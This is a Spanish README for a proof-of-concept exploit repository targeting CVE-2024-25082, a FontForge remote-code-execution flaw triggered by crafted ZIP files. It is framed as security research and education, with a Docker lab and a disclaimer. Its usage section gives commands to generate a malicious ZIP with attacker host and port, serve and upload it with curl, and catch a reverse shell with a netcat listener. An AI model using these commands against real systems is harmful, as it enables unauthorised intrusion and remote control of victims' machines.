
Exploit de prueba de concepto para CVE-2024-25082, que demuestra ejecución remota de código en FontForge mediante archivos ZIP manipulados. Incluye generador de payloads, laboratorio Docker y documentación técnica para investigación y educación en seguridad.
Exploit de Prueba de Concepto para CVE-2024-25082, una vulnerabilidad que afecta a FontForge y permite Ejecución Remota de Código (RCE) a través de un archivo ZIP manipulado.
Este repositorio demuestra cómo se puede explotar la vulnerabilidad en un entorno de laboratorio controlado con fines de investigación en seguridad y educativos.
La vulnerabilidad se produce debido a una validación incorrecta de los archivos dentro de archivos ZIP, lo que permite a un atacante ejecutar comandos arbitrarios en el sistema objetivo.
CVE-2024-25082-FontForge-ZIP-RCE/
├── README.md
├── exploit.py
├── poc/
│ └── exploit.zip
├── writeup.md
└── License
Archivo Descripción
exploit.py Genera la carga maliciosa ZIP poc/ Contiene los archivos de prueba de concepto generados writeup.md Explicación técnica de la vulnerabilidad
Instalar herramientas opcionales:
sudo apt install netcat
python3 exploit.py --lhost <Tu IP> --lport <Tu Puerto>
Esto generará un archivo exploit.zip malicioso.
python3 -m http.server 8080
curl http://<Tu IP>:8080/exploit.zip -o /ruta/al/directorio/de/subida/exploit.zip
nc -lvnp <Tu Puerto>
Si tiene éxito, se debería obtener una shell del sistema objetivo.
Se proporciona un entorno vulnerable reproducible dentro del directorio docker/.
Ejemplo:
cd docker/vulnerable_env
docker build -t fontforge-vuln .
docker run -p 8080:80 fontforge-vuln
Esto permite realizar pruebas seguras sin afectar sistemas de producción.
Un atacante que pueda cargar o controlar archivos ZIP procesados por la aplicación vulnerable podría:
Medidas de mitigación recomendadas:
Este repositorio contiene código de Prueba de Concepto para una vulnerabilidad divulgada públicamente.
El código se proporciona estrictamente para:
NO utilice este código contra sistemas sin permiso explícito.
El autor no asume ninguna responsabilidad por el mal uso o daños causados por este software.
Moamen Elmaghrabi
Estudiante de Ciberseguridad
Pruebas de Penetración y Desarrollo de Exploits
Este proyecto está licenciado bajo la Licencia MIT.
Consulte el archivo LICENSE para más detalles.